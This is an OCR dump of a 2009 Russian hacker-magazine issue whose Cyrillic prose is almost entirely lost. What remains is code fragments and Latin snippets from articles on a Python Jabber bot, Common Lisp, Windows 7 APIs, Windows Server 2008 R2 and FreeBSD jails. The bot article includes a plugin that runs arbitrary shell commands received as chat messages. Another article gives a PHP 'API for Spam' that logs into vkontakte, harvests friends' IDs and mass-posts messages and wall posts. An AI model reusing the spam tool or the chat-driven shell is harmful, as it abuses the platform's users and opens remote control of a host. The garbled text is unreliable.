jabber-
Python
, -
.
, ,
putty, - ( ,
?).
,
.
, , (
).
,

. ,
?
, ,
(,

092

/ !),
, .
,
-, ,
,
,
.
, .

PYTHON & JABBER


Python? ,
(

Perl, - ) (
PHP) .
,

(

-
).
- : .
X 06 /126/ 09

>> coding
, (
).
ini- ConfigParser.
. , read ,
. , get, ,
- .
.
:


(xmpp.org/rfcs) .

, ,
eLWAux (
).

. , :
Twisted Words
(twistedmatrix.com/projects/words);
jabber.py
(jabberpy.sourceforge.net);
xmppppy
(xmpppy.sourceforge.net).

. xmppppy
. .

, : ,
. , , .

,
.
(bot.
py), (config.ini),
(plugins) xmpppy.
. ,
, .


. ,
,
,
.
.
.



,
ini- config.
ini (, ini
). connect ,
, permission
X 06 /126/ 09

def loadConfig():
import ConfigParser
config = \
ConfigParser.ConfigParser()
config.read('config.ini')
login = config.get('connect',
'login')
password = config.get(connect,
'password')
allow_password =
config.get('permission',
'allow_password')
user_no_pass = config.get(
'permission', 'user_no_pass')
user_no_pass = \
user_no_pass.split(',')
return {'login':login,
'password':password,
'allow_password':allow_password,
'user_no_pass':user_no_pass}


, ,
split .
( ).
:


xmpppy
. jid xmpp.JID,
,
.
bot xmpp.Client , ,
,
(-
).
jid = xmpp.JID(config['login'])
bot = xmpp.Client(jid.
getDomain(),debug=[])


( ,
), bot
. ,

(, help
, )? ,
bot . , :
bot.config = config

:
bot.connect()
bot.auth(jid.getNode(),
bot.config['password'])

xmpppy

. ,
, message, , bot.
RegisterHandler :
bot.RegisterHandler('message',
message)

config = loadConfig()

bot.
Process(1),

JABBER
Jabber
XMPP.
1998 jabberd. jabber xmpp.
jabber xmpp. ,
xmpp IETF.
- Jabber ID ( JID).
JID ,
. , @. ,
JID,
. , user@example.
com/work, , user@example.com, , user@example.com/work
!

093

++++

>> coding

ROMEO

++++

MONTAGUE

++++

++++

( , , PHP),
, .
:

++++

a = 1; b = a; b = 2
print a #1
print b #2

++++

++++

1, 2, . ,
? :
class Obj():
def __init__(self):
pass

++++
a = Obj(); a.var = 1; b = a; b.var = 2

++++

++++

++++

++++

++++

++++

++ ++

print a.var #2
print b.var #2
! ! , =
, ,
.
,
bot ,
.
. ,
, online ,
,
:

INTERNET

XMPPPY

JULIET

xmpppy .
.
JID Jabber ID.
Jabber-.
:
getDomain, ;
getNode, ;
getResource, .
Client.
- .
:
connect, ;
auth, , :
;
RegisterHandler, ,
(message, presence, iq) ;
sendInitPresence, , ;
send, , Message;
Process, ;
disconnect, .
Message .
.
:
getBody, ;
getFrom, , .
bot.online = 1
while bot.online:
bot.Process(1)
bot.disconnect()



def message(conn,mess):
global bot
text = mess.getBody()
#
if ( text == None ):
return

++++
#
command = text.split('')
command = command[0]

#
user = mess.getFrom()
user = str(user).split('/')
user = user[0]
#
if user not in bot.config['user_no_pass']:
text = "wrong command. try 'help'"
bot.send(xmpp.Message(mess.getFrom(),text))
return

++++

++++

++++

#
if command in bot.plugins[public_commands]:
#
runPlugin(command,bot,mess)
return

094

#
if command in bot.plugins['commands']:
runPlugin(command, bot, mess)
else:
text = "wrong command. try 'help'"
bot.send(xmpp.Message(mess.getFrom(),text))
X 06 /126/ 09

>> coding

NETBEANS IDE
PYTHON

1 0.
, .
,
.
,
, :
def message(conn,mess):
global bot
if (mess.getBody() == None ):
return
bot.send(
xmpp.Message(mess.getFrom(),'hello'))

global bot .
, mess.
getBody .
None, ,
(, , - ). ,
.
send, .
Message
xmpppy. : ,
.


xmpppy, -,
( , !). .
,
. , ,
echo some text
, echo
echo.py plugins.
. , init,
1,
, 0, .
run
. ,
echo :
X 06 /126/ 09

import xmpp
def init():
return 0
def run(bot,mess):
bot.send(xmpp.Message(mess.getFrom(),
mess.getBody()))

, .
, plugins,
__init__.py
.
__import__.
, ,
plugins ( __init__.py) - .
, ,
.
(public_commands) ,
, (commands)
(, VIP) .
:
def loadPlugins():
import os
commands = []
public_commands = []

HTTP://WWW
links
xmpppy.sourceforge.
net c xmpppy.

DVD
dvd

.
, ,

DVD.

# plugins
for fname in os.listdir('plugins/'):
# '.py'
if fname.endswith('.py'):
# 3
plugin_name = fname[:-3]
# '__init__'
if plugin_name != '__init__':
#
plugins = __import__('plugins.' +
plugin_name)
#
plugin = getattr(plugins, plugin_name)
#
if plugin.init():

095

++++

>> coding

ROMEO

++++

MONTAGUE
.NET

INTERNET

++++

JULIET

KOARL

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

commands.append(plugin_name)
else:
public_commands.append(plugin_name)
#
return {
'plugins':plugins,
'commands':commands,
'public_commands':public_commands
}

:
-,

.
, .


,


.

.
plugins ,
getattr , ,
. , ,
, . ,

init. public_commands, commands.
:

CAPULET
.COM

WASINET

.ORG

message,
PETER
FRANZ
.
:
(
);
.
,
.
, .

.
, . ,
mess.getFrom(),
( ).
? (
), . ,
, , split(/)
. .


, , .
cmd, :
4 ( ,
cmd ls ls).
os.popen(cmd).read().
( ) utf-8 (
,
UNICODE).
.
:
import xmpp
import os
def init():
return 1
def run(bot,mess):
cmd = mess.getBody()
cmd = cmd[4:]
output = os.popen(cmd).read()
if not isinstance(output, unicode):
output = unicode(output,'utf-8','ignore')

bot.plugins = loadPlugins()
bot.send(xmpp.Message(mess.getFrom(),output))

, ,
, :

++++
def runPlugin(command,bot,mess):
plugin = getattr(bot.plugins['plugins'],command)
plugin.run(bot,mess)

++++

++++

, ( command), bot.plugins[plugins] run.

096

HAPPY END

.
, , .
, ,
.
, . -
! z
X 06 /126/ 09

P
++++

++++

++++

++++

>> coding

(cons a 3))
(setq a 43)
(list a (cons a 3))

W
M
I
T
H
WITH L
I
W
S
P
LISP
MADE
WITH
LISP

defun two-funs (x) (list (function (lambda () x))


; (43 (43 . 3))

(function (lambda (y) (setq x y)))))


(setq funs (two-funs 6))

(list (quote a) (quote (cons a 3)) ; (a (cons a 3))

(funcall (car funs))

;6

(funcall (cadr funs) 43)

++++
LINKFLY

(funcall (car funs))

; 43

; 43

/ HTTP://LINKFLY.RU /

++++

++++

++++

++++

++++

++++

++++

LISP ()
Common Lisp:
?
Lisp. ,
( )
1958 ,
.

++ ++


? , ()
. , ,

http://rsdn.ru:


. ,
.

++++

++++

++++

++++

++++

++++

,
Common
Lisp ( ,
Scheme). (
ELisp
AutoLisp/VisualLisp) .
, Lisp?
,

098

, ,

AI-. ,
-, , ,
-
.

.
:
1. , , :
: (_ 1
2 N).
2.
, : (_ (+ 1 2)
2).
,

,
. .
, , , -

. ,
: ! ,

, ,
.

,
.


: http://
pcl.catap.ru,
Common
Lisp .

- LispWorks,
www.lispworks.com/downloads.
?
?
X 06 /126/ 09

MADE WITH
WITH LISP
,

GUI? ! http://
franz.com/downloads -
Allegro CL 8.1 Free Express Edition.
; GUI-,
exe-.
Windows, Linux,
MacOS, FreeBSD ( ). ,
:
? ,
LispWorks ( ) $1500.
( )
, , .
,
Eclipse,
- SBCL, CUSP, : http://bitfauna.com/
projects/cusp. SBCL. http://www.sbcl.org/platform-table.html.

, , , -

1.
( ).
2.
.
3. .
4. , run-time.
5.
.
6. open-source
(http://cliki.net).
7. , ,
(CLOS).
8. , .
9.
.
10.
( LOOP).

X 06 /126/ 09

LISP

. ,
,




, -
.

. , ,
, : X86, AMD64, PPC, SPARC, Alpha, MIPSbe,
MIPSle. ?
: Linux,
Darwin(Mac OS X), Solaris, FreeBSD, NetBSD,
OpenBSD, Windows. ,
? , Windows
(,
x86). ,
Windows-, . ,
, ,
ASDF-INSTALL,
- (
http://cliki.net).
, SBCL - (
), Common
Lisp .

Emacs SLIME.

EMACS SLIME SBCL.
SLIME : http://commonlisp.net/project/slime.
,
LispBox : http://common-lisp.net/project/
lispbox : http://gigamonkeys.com/
book/lispbox.

.


-
. ,
LispWorks
:
CL-USER 1 >

, . UNIX Shell: ,

>> coding
Enter
.

.


, ,

. ,
- .

:
(defun factorial(x)
(if (zerop x)
1
(* x (factorial (1- x)))))
;
,
:)
> factorial
(factorial 5) ;
> 120

,
(
) . ,
,
, - ,
. ?
.

, , ; ,
.
-, ?
, ,
/ , , .
:
1. (, B)
,
(, A)
.
2. , - ,

( A,
B),
( A B).


B. .
3. , , A.
, ,

B, A
,
.
:
;
(defun relation-is (obj1 obj2)

099

++++

>> coding

++++

++++

++++

++++

++++
ALLEGRO CL 8.1 FREE EXPRESS EDITION
++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

(list obj1 'is obj2))


;
(relation-is 'cat 'animal)
> (cat is animal)
;
(setf (symbol-function 'old-relation-is)
(symbol-function 'relation-is))
;
(defun relation-is (obj1 obj2)
; relation-is
(list :relation (old-relation-is obj1 obj2)))
;
(relation-is 'cat 'animal)
> (:RELATION (CAT IS ANIMAL))

,
:
(setf (symbol-function 'old-factorial)
;
(symbol-function 'factorial))
(defun factorial(x)
(print x)
(list (list 'factorial x) ;
(old-factorial x)))
(factorial 5) ;
> !!! "In * of (1 (('FACTORIAL 0) 1))
arguments should be of type NUMBER."

,
. - ,

, ,
. ?
. ,
, - (
), , .
? -
*this*, , . :

WITH
MA LISM
P
A
D
D
E
E
W
I
-
T
W
I
T
H
H

LISP
LISP
S-expression ( s-expr) ,
.
S-.
, , NIL (
()).
( ... ) . ,
.
QUOTE ( ), .
SETQ ( ): (setq myvar
(a b c)) (setq myvar2 999).
SETF : (setf (cadr mylist)
newatom). .
LIST : (list a b c) > (a b c).
LET , : (let ((myvar1 1) (myvar2 3)) (+ myvar1
myvar3)).
DEFUN : (defun my-func (arg1 arg2) ...
< arg1 arg2>).
DEFMACRO , ( DEFUN, .
).
MACROEXPAND :
(macroexpand (mymacro arg1 arg2)).
FUNCALL (funcall
(symbol-function list) a b).
SYMBOL-FUNCTION ,
, ( SETF).
MACRO-FUNCTION , , .
ZEROP T, .
PRINT .

;;; 3.

, *this*. , ,
. , :
(defmacro defun-new (name args &body body)
'(let (*this*) ;
(defun ,name ,args ,@body)
;
(setq *this* (symbol-function ',name))
; -
',name)) ;defmacro
;
(defun-new f(x) (list x *this*))
(f 34)
> (34 #<interpreted function F 200D8832>)

? :

++++

;
(defun factorial(x)
(if (zerop x)
1
(* x (funcall *this* (1- x)))))

++++

100

(macroexpand '(defun-new f(x) (list x *this*)))


> (LET (*THIS*)
(DEFUN F (X) (LIST X *THIS*))
(SETQ *THIS*
X 06 /126/ 09

>> coding

DE
H
LISPWORKS PERSONAL
(SYMBOL-FUNCTION (QUOTE F)))
(QUOTE F))

defun-new:
1) LET
*THIS*.
2)
DEFUN, *THIS*.
3) (SETQ *THIS* (SYMBOL-FUNCTION (QUOTE F)))
*THIS*, ,
DEFUN . NIL , ,
.
4) (QUOTE F) . factorial
DEFUN-NEW, *THIS*
,
.
. ,
, ( DEFUN-NEW), *THIS* ,
. , *THIS*
. ,
-,
, . ,
- . ,
*THIS*,
,
- ! - , - run-time.
, *THIS* ,
, *THIS* - ,
()
.
,
( *THIS*):
;;;
;;;
; *THIS*
(defun factorial(x)
(if (zerop x) 1 (* x (factorial (1- x)))))
(setf (symbol-function 'old-factorial)
X 06 /126/ 09

(symbol-function 'factorial))
(defun factorial(x)
(print x) ;-
(list (list 'factorial x)
(let ((new-factorial
(symbol-function 'factorial)))
(setf (symbol-function 'factorial)
(symbol-function 'old-factorial))
(prog1
; (factorial x)
(old-factorial x)
(setf (symbol-function 'factorial)
new-factorial)
)) ;prog1, let
) ;list
) ;defun
(factorial 5) ;

,
*THIS*. , DEFUN-NEW, :
;
DEFUN
(setf (macro-function 'defun-old)
(macro-function 'defun))
; DEFUN, DEFUN-OLD
(defmacro defun (name args &body body)
'(let (*this*)
(defun-old ,name ,args ,@body)
(setq *this* (symbol-function ',name))
',name))
;
(defun f(x)(list x *this*))
(F 5)
; , DEFUN
(setf (macro-function 'defun)
(macro-function 'defun-old))

! ! - , , .
int my_function(char arg1, char arg2) {}
.
,
;).
:
, , .
.

, ,
:).
, :
,
, (exe, elf),
--,
, , ,
, , , .
To be continued. z

HTTP://WWW
links
,

:
alu.org.

:
common-lisp.net.

DVD

M
WI
LIES
MAD
H
T
I
W
P
S
I
LMAD
WITH
LISP
M
W

dvd

101

++++

>> coding

INTERNET

++++

++++

/ ASTERGANSTER@GMAIL.COM /

++++

@
++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++


:
. , , .
,
:
,
,

,
. ,
, .
? ?

102

. ,

,
, ,
...



. , ,
:
1) -

,
( ,
).
2)
,

( ). ,
.
X 06 /126/ 09

>> coding



3)
,
. ,
- ,
captcha.
4)
.
.
5)
captcha.

.
-

. ,
,
. , /

, .
,
,
. , ,
(
!),

-.
,
,
,
,

!
, :

?

:
:
, . :). ,
, .
-
. , ,
X 06 /126/ 09


LOGIN_COOK()
AFORS
..........................
public $auth_cook; // -
..........................
..........................
$ch=curl_init(); // CURL
// CURL
//
//
curl_setopt($ch, CURLOPT_URL,
'http://vkontakte.ru/login.php');
..........................
..........................
//
//
//
//
// cookies
// ( )
// POST-
//
// $answer
// CURL
..........................
..........................
//
// 'captcha_sid'
if (strpos($answer, captcha_sid)<>0)
{
preg_match_all('#sid":"(.*?)"#', $answer, $sid_id);
// -id captcha
return "sid_cap:".$sid_id[1][0];
}
else
{
//
// 'failed'
if (strpos($answer, 'failed')<>0)
return "failed"; // 'failed'
else
{
// cookies
// $this->auth_cook
preg_match_all('#Set-cookie: (.*;)#UiS',
$answer,$answer);
for($t=0;$t<count($answer[0]);$t++)
$auth_cook.=$answer[0][$t];
preg_match('#remixmid=(.*?);#', $auth_cook, $myid);
$this->auth_cook=str_replace("Set-Cookie:",
"", $auth_cook);
// id
return $myid[1];
}
}
..........................

103

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

.
, ,


FR_REC()
AFORS

..........................
public $fr_siz; // -
public $fr_mass; // -
..........................
..........................
$ch=curl_init(); // CURL
// CURL
//
//
curl_setopt($ch, CURLOPT_URL,
'http://pda.vkontakte.ru/write');
..........................
..........................
//
//
//
// cookies
//
// $answer
// CURL
..........................
..........................
// id
// $this->fr_mass,
// $this->fr_siz
preg_match_all('#<option value\="([0-9]+)">#UiS',
$answer,$this->fr_mass);
$this->fr_siz=count($this->fr_mass[1]);
}
..........................

104

.
,
Curl PHP. : API for Spam, afors.

1.
AFORS.

cookies, . ,
, cookies,
.
POST-
, .
( SmartSniff http://www.
nirsoft.net)
.
,
, cookies .

, POST-
( , Accept-Encoding
identity, ).
, web-
. ,
.
(
DVD ). PHP- : login_
cook($login,$pass,$captcha_sid,$captcha_key).
POST- http://
vkontakte.ru/login.php. login_cook()
, , id-
captcha captcha,
( ,
). cookies $thisauth_cook.
id cookies public $auth_cook.
failed.
(id) captcha. , : sid_
cap:213610192404. id, http://vkontakte.ru/captcha.php?s=1&sid=213610192404

captha .
X 06 /126/ 09

>> coding

2.

3.

, cookies, ,
id
,
.
fr_
rec($cookie), cookies, , ,
login_cook(). :
html- , http://pda.vkontakte.ru/write:

,
id .
, id .

id , ,
id ,
( id).
.
. ,
id.
user_hash($id,$cookie),
: id , , . http://vkontakte.ru/mail.
php?act=write&to=.$id, $id
id .
html-
. $chas,
$chas[1] chas, $chas[2] secure.
chas secure
,
id ,
http://vkontakte.ru/mail.php
.
, , , .
1 2.

. ,
.

,
ID
.


,

ID
.
, - public $fr_siz
public $fr_mass, , ,
id ($fr_mass [1][$x], x 0
$fr_siz).
X 06 /126/ 09

4. SEND_MESS()
AFORS
,
. send_mess($id, $cash,
$sec, $cookie,$titl,$mess, $captcha_sid,
$captcha_key). :
id ; chas; -

DVD
dvd
:
Denwer c
PHP 5.x.x
Curl;
SmartSniff;
AforS c

.

(info.txt)

PHP!

WARNING
warning
,


?



105

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

secure; ; ; ;
-id captcha; captcha (
, ).
http://vkontakte.ru/mail.php,
POST-
.
1 , 0 id-
captcha ,
captcha.
, , , .
,
?
clean_onemess($cookie) , .
cookies .
1, 0.

5.

.
:
,
.
user_wall_hash($id,
$cookie),
http://vkontakte.ru/id.$id, $id id .
id ( )
cookies, .
$chas, $chas[1] -
wall_hash, $chas[2]
mid. send_wall($wall_hash,$mid,$cookie,$mess,$
captcha_sid,$captcha_key),
http://vkontakte.ru/wall.php,
POST. : wall_hash; mid;
cookies; ; id- captcha;
captcha ( , , , ).
1,
0; captcha-
id- .


, .
Gorl, . ,
(
), ,
PHP, Curl
PHP, . ,
, . , .
. !
, :

106

<?
include("afors.php"); //
$m=new afors();
//
$mess="Hello World";
//
// cookies
$m->login_cook("login", "password",0,0);
// $cookies cookies
$cookies=$m->auth_cook;
//
$m->fr_rec($cookies);
//
// 11- (fr_mass[1][10])
$g=$m->user_hash($m->fr_mass[1][10],$cookies);
sleep("5"); // 5
//
$re=$m->send_mess($m->fr_mass[1][10],$g[1],
$g[2], $cookies, " Hello",$mess, "0", "0");
sleep("5"); // 5
//
//
$re2 = $m->clean_onemess($cookies);
// send_mess()
// clean_onemess()
echo $re."::".$re2;
?>

? 12 , ? !
:
<?
include("afors.php"); //
$m=new afors();
//
$mess="Hello World";
//
// cookies
$m->login_cook("login", " password ", "0", "0");
// $cookies cookies
$cookies=$m->auth_cook;
//
$m->fr_rec($cookies);
//
// 11- (fr_mass[1][10])
$wall=$m->user_wall_hash($m->fr_mass[1][10],
$cookies);
sleep("5"); // 5
//
$re=$m->send_wall($wall[1], $wall[2], $cookies,
$mess, "0", "0");
// send_wall()
echo $re;
?>

10 . , , ,
.

,
- .
,
, . ,
. , ! z
X 06 /126/ 09

++++

>> coding

++++

++++

SENSOR APP

LOCATION API

LOCATION APP

++++

SENSOR API

++++

USER
CONTROL PANEL

++++

I\0 Reguest

++++

UMDF

SENSOR CLASS
EXTENSION

SENSOR DRIVER
++++

WPD OBJECTS
IPortableDeviceVaues
IPortableDeviceVauesCollections
IPortableDevicesKeyCollections

++++

WINDOWS SENSOR
PLATFORM

++++

/ ANTONOV.IGOR.KHV@GMAIL.COM /

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

WINDOWS 7

,
Windows 7 , Microsoft,
. , ,
.


, , ,
. MS,
, -

108

.
MultiTouch ( : Windows
Touch)
.
iPhone, ,
Windows 7 ( ,


).

Windows Touch,
API-,
X 06 /126/ 09

>> coding
MultiTouch . API ,
( ).
,
. (
, ),

API-,

(,
).

(WINDOWS DEVICE
PLATFORM)
,
.
.
, , mp3-, , .
,

Sepultura. , Windows 7
Windows Device Platform. API
.
,
Windows 7
-
. . ,
,
.

WINDOWS BIOMETRIC
FRAMEWORK
Windows 7
Windows Biometrics FrameWork.

,
.

Windows Biometric Service.

,


. ,
.

Windows .
API-.
,

, ,
. X 06 /126/ 09

(Windows
Biometric Service),

.
, Windows
.
,

, ,
, .

, ,
.
-


http://blogs.msdn.com/windev Windows 7 for Developers. ( )
Windows 7.
http://way2cloud.com , Windows Azure. ,
, . ,
.
http://progblog.ru : .NET Framework , .
.NET-.
http://windowssteamblog.com/blogs/developers Windows
7 for Developers.
http://aspnetmania.com ASP .NET. , ,
. .
http://weblogs.asp.net/scottgu ScootyGus, ASP .NET.
: Tips And Tricks,
ASP .NET, . . .
http://asp.net/mvc ASP .NET (AJAX, MVC . .). MVC, AJAX .
(, , ) .
.
http://techdays.ru Microsoft. . , . .
www.microsoft.com/whdc/device/input/smartcard/WBFIntro.mspx Windows Biometric Platform. , .
http://download.microsoft.com/documents/rus/windows/V7DEV.pdf
,
Windows 7.
http://download.microsoft.com/documents/rus/windows/V7IT.pdf ,
Windows 7.
, IT-.
http://blogs.microsoft.co.il/blogs/sasha/archive/2009/02/25/windows-7-trigger-startservices.aspx Trigger-.
http://code.msdn.microsoft.com/WindowsAPICodePack -
Windows API Code Pack for .NET Framework.
http://www.pinvoke.net Windows API- .

109

++++

>> coding

++++

++++

++++

++++

++++

++++
WINDOWS BIOMETRIC SERVICE
++++

,
.
.

++++

WINDOWS SENSOR AND LOCATION PLATFORM

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

Windows Sensor and Location Platform , (


iPhone).
, , ,
.
, , ,
. ,
.
, , .
,
(

), , ,
.
Location Platform ,
.
GPS.
API (++/ ). SDK
, .
, ( - ,
), SDK .

Windows Vista -, SideBar , , .


Windows 7 ,
. ,
,
.
,
,
, .

110


MICROSOFT:

,
PARTNERS LEAD DPE

Windows 7 ,
,
. IT-
(Application Compatibility Infrastructure),
(shims) (layers).
(Application Verifier, ),

, .
Application Compatibility Infrastructure Windows
API
Windows. 360
, (
50% !) , ,
.. 60
, .
Windows 7 RC
6000 .


,
.
X 06 /126/ 09

>> coding

HELP SDK

TASKBAR
Windows 7 . , ,
: , . , TaskBar
,
. ,
, ,
TaskBar. ,
. , JumpList (
TaskBar). JL, ,
, .
(
!) .
IconOverlay (
), .
Windows 7
API- .
MSDN, SDK beta Windows API CodePack.

WINDOWS SCENIC RIBBON


Ribbon, MS Office 2007,
. Windows 7, Ribbon
Scenic Ribbon
. ,
, Win32 API. , ,
.
X 06 /126/ 09


Windows Driver Kit . ,
. ,
(, Sensor
Location). ,
.
, ! WDK 3.0 PRefast.
PRefast PREfast for Driver
.

POWERSHELL 2.0
PowerShell , . ,
,
? PS . , PowerShell bash,
, .
Microsoft , Windows 7
,
:
1. PowerShell . . (,
..),
Visual Studio.
2. . IIS,
ActiveDirectory ..

111

++++

>> coding

++++

++++

++++


/ AZANITO@GMAIL.COM /

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++


?

,
, .
Symbian, iPhone, BlackBerry, Windows Mobile, Android
.

IE8 .
R&D?
3.
,
.
4. . 2.0,
.
5. . .
, .

TRIGGER START SERVICE


Windows .
. , - .

. Windows 7 : Trigger-.
. ,
,
, .


WINDOWS API CODEPACK
FOR MICROSOFT .NET FRAMEWORK
Vista- Vista Bridge,

. Windows 7
Windows API CodePack for
Windows .NET Framework.
, , :
, Windows Sensor Platform, TaskBar, TaksDialogs, Windows
Location Platform.

112

( )
- ( ). Windows 7.

WINDOWS 7 SDK
SDK Windows 7 beta ,

.. , , .
, , . ,
. SDK . MSDN Reader
.
( ,
, ),
.
,
-
( SDK).
Windows Sensor Platform, SDK
Super Bar ( JumpList ..),
Scenic Ribbon,
..
Windows 7, SDK
(, Windows 7 RC).

INTERNET EXPLORER 8
, , Windows 7
Internet Explorer 8. , . ,
(Developer Tools),
X 06 /126/ 09

>> coding


,
JScript. Developer Tools,
html . JScript
. , FireBug, IE :).


,
.
,
. , . ,
, ,
.
API .
Windows Vista ,
. 99%
Windows 7. ...
, , .
, Windows Vista, :
. ,
, , Windows XP? ,
- Windows Vista XP .
X 06 /126/ 09

Windows 7 ,
Windows Vista. Windows Vista
Windows 7,
Vista.
Windows 7
Application Verifier (
http://blogs.msdn.com),
Windows 7.
:
. . IT-.
, .

, Windows 7. : Libraris, Windows WEB


Services ..
Microsoft (
). , .
, , Windows 7, , ,
, ,
. ,
-, .z

113

>> SYN/ACK

Windows Server 2008 R2:


>> SYN/ACK

Microsoft Vista.
Windows 7, Win2k8, R2, . ,
,
.
WIN2K8R2


Windows Server 7, PD
C 2008 ,
Windows Server 2008 R2,
,
.
,
,
. Microsoft
, ,

2 () 4 (
), R2 Win2k8. , ,
.
, Win2k8
,
,
.
Win7Server,
Vista Win7.
-
2008 .
, ,
. ,
Win7 ,
,
.
,
R2, ,

114

,
.
. .

?
Hyper-V 2.0,
Live Migration,

.
.

VHD (Virtual Hard Disk) . ,
, Hyper-V
,
,
with Hyper-V.
Hyper-V
R2 . :
Server Virtualization, Client Virtualization
Presentation Virtualization. ,
R2 VDI-
(Virtual Desktop Infrastructure,
),

.
?
Hyper-V WinXP

Win7. (,

Windows
Fundamentals Linux),
,
(VDI
) . VM
,
, VDI
. , VDI
RDP- .
Terminal Services
Remote Desktop Services (RDS),

VDI. VDI
RDS.
,
. Win7

RemoteApp & Desktop Connection,

.
PowerShell 2.0,
, 1.0,
:
API;
GUI ;
PowerShell Remote Desktop;
X 06 /126/ 09

>> SYN/ACK

Windows
Windows Server

Smol Server


WinRM 2.0;
(PSJob);

WPF (Windows Presentation
Foundation)
.NET Framework 3.0,
.

(cmdlets), 240 .
IIS ( 7.5) FTP ( , .NET XML), WebDav, URLScan
3. ( http-),
Administration Pack ( SQL-,
, , ,
www.iis.net/extensions/administrationpack).
,
.
PHP FastCGI. IIS 7.0
, .
IIS 7.5
,
. , , IIS , , Microsoft
7.5.
X 06 /126/ 09


Visual Studio 10,
Web Deployment Tool (MS
Deploy),
Web- ,
,
, SSL.
Server Core
.NET, ASP.NET PowerShell.
2.0 and 3.0 .NET Framework
DISM (Deployment Image Servicing and
Management),
WAIK (
/Online
):
> dism /Online /Enable-Feature /
FeatureName:NetFx2-ServerCore
> dism /Online /Enable-Feature /
FeatureName:NetFx3-ServerCore


File Server Resource Manager.
NTFS
SharePoint
.

64BIT
, Win2k8
32- .
R2
x64/ia64. AMD
Intel 32-
x86, 32-
64-
. 32-
R2 WOW64 (Windows on
Windows64). Server
Core Hyper-V WOW64 . 32-
,
:
> dism /Online /Enable-Feature /
FeatureName:ServerCore-WOW64

32- .NET-:
> dism /Online /Enable-Feature /
FeatureName:NetFx2-ServerCore
> dism /Online /Enable-Feature /
FeatureName:NetFx2-ServerCoreWOW64

115

>> SYN/ACK


WINDOWS 7

UAC

HTTP://WWW

> start /w ocsetup ServerCore-WOW64


> start /w ocsetup NetFx2-ServerCore-WOW64

,
WOW64. , , 32-
Windows
.
Server 2008 R2:
Win2k8 64

. R2 256. IT-
Microsoft TechNet , ,
go.microsoft.com/
fwlink/?LinkID=66006. . , , , ,

. ,

Hyper-V, 32 CPU ( Microsoft MSDN
4). , go.microsoft.com/
fwlink/?LinkId=67404. ,
Support
Knowledge Base (KB) . , Win2k8R2
32 4- ,
go.microsoft.com/
fwlink/?LinkID=55142. 2
(32 CPU 4 2 = 256).

: 1.4
Microsoft Connect
64bit CPU, 512 RAM, HDD 10 . ,
go.microsoft.com/
fwlink/?LinkId=50067. , . ,
Standard 32 RAM, Enterprise
Datacenter 2 RAM.
R2 ;
INFO
. , Windows Firewall
(Private, Public Domain),

; http- QoS, info
VPN Reconnect DHCP Failover. QoS
Windows 7
IT. Application Name Policy-Based

QoS ,
, .
.
Application Name or URL,
/ http-,

.
Win2k8
VPN Reconnect, RRAS

Longhorn - ( ),
VPN-

VPN- , VPN-
2008 .
( -).

links

116


BEST
PRACTICE ANALYSER

VPN Reconnect, VPN


IKEv2 (Internet Key Exchange, RFC 4306).


, Win2k8
Next, R2
(,
Windows 7).
6 ,

.
( ,
CD/DVD, ).

( ),
BitLocker.
, .
,
Win7. ,
Appearance.
Screen Resolution.
.
, , ,
.
Win2k8,
R2 . Initial Configuration Task, , . Server Manager ,

. Action Connect to
Another Computer , R2. :
, Server Core. ,
: ,
/ Core . , Server
Manager Remote Server Administration
Tools Win7 ( RSAT Win2k3
Win2k8). ,
, . ,
, trusted hosts
( WinRM
, z 2009 ).
X 06 /126/ 09

>> SYN/ACK


POWERSHELL


WIN2K8R2

> winrm set winrm/config/client @


{TrustedHosts="system, system2"}

UAC . ,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\policies\system,
LocalAccountTokenFilterPolicy DWORD 1.
, -
, ,
Elevated permissions are required run . : cmd.exe Run as
administrator.
, 17
40 ( Win2k8 16 35), .
, Terminal Services
Remote Desktop Services, , . WSUS
R2.
, .
BranchCache ( , ), Direct Access ( ), WinRM IIS Extension
(
WS-Management), Windows Server
Migration Tools (
Win2k3-Win2k8 R2).
(Web-server IIS, AD Domain Services, AD Sertificate
Services, DNS, RDS) Best Practices Analyzer
(BPA). Microsoft, ,
,
. PowerShell AddWindowsFeature, Get-WindowsFeature Remove-WindowsFeature , .
, ,
Servermanager. :
PS C:\> Import-Module servermanager
PS C:\> Get-WindowsFeature

, :
PS C:\> Add-WindowsFeature -Name "File-Services"
IncludeAllSubFeature

ACTIVE DIRECTORY AD DS (Active


Directory Domain Services) R2 X 06 /126/ 09

SERVER MANAGER

. , Active
Directory Recycle Bin, Windows.
.
,
,
.
AD RB .
AD RB 180
, Recycle Bin Lifetime,
. , msDSdeletedObjectLifetime. Win2k8R2,
AD .
PowerShell . R2
:
PS C:\> Set-ADForestMode Identity domain.ru
-ForestMode Windows2008R2Forest

AD RB:
PS C:\> Enable-ADOptionalFeature Identity 'CN=Recycle
Bin Feature,CN=Optional Features,CN=Directory
Service,CN=Windows NT,CN=Services,CN=Configuration,DC=
domain,DC=ru' Scope Forest Target 'domain.ru'


ldp.exe Get-ADObject RestoreADObject.
R2 djoin.exe,
, .
, . :
, djoin.exe,
XML-,
.
, Active Directory,
AD
ADUC (Active Directory Users and Computers console).

,
Win2k8R2 , Windows-. , - .
, Win2k8R2,
. ! z

117

>> SYN/ACK

/ J1M@SYNACK.RU /


FreeBSD
, . ,
. -.
>> SYN/ACK


,
.
,
.

, mdconfig mount.
:
1.
,
.
2.
.
3.
.
/usr/
jailbase/FreeBSD-
2 ,

:
# dd if=/dev/zero of=/usr/jailbase/
FreeBSD-'uname -r'.2g.image bs=1m
count=2k
# bsdlabel -w -f /usr/jailbase/
FreeBSD-'uname -r'.2g.image auto
# mdconfig -a -t vnode -f /usr/
jailbase/FreeBSD-'uname -r'.2g.
image -u 0
# newfs md0c
# mount /dev/md0c /mnt

118

# cp -a /usr/jailbase/FreeBSD-'uname
-r' /mnt
# umount /mnt
# mdconfig -d -u 0
# rm -Rf /usr/jailbase/FreeBSD'uname -r'


/usr/jailbase/conf,

.
,
addvserver
startvserver
.
:
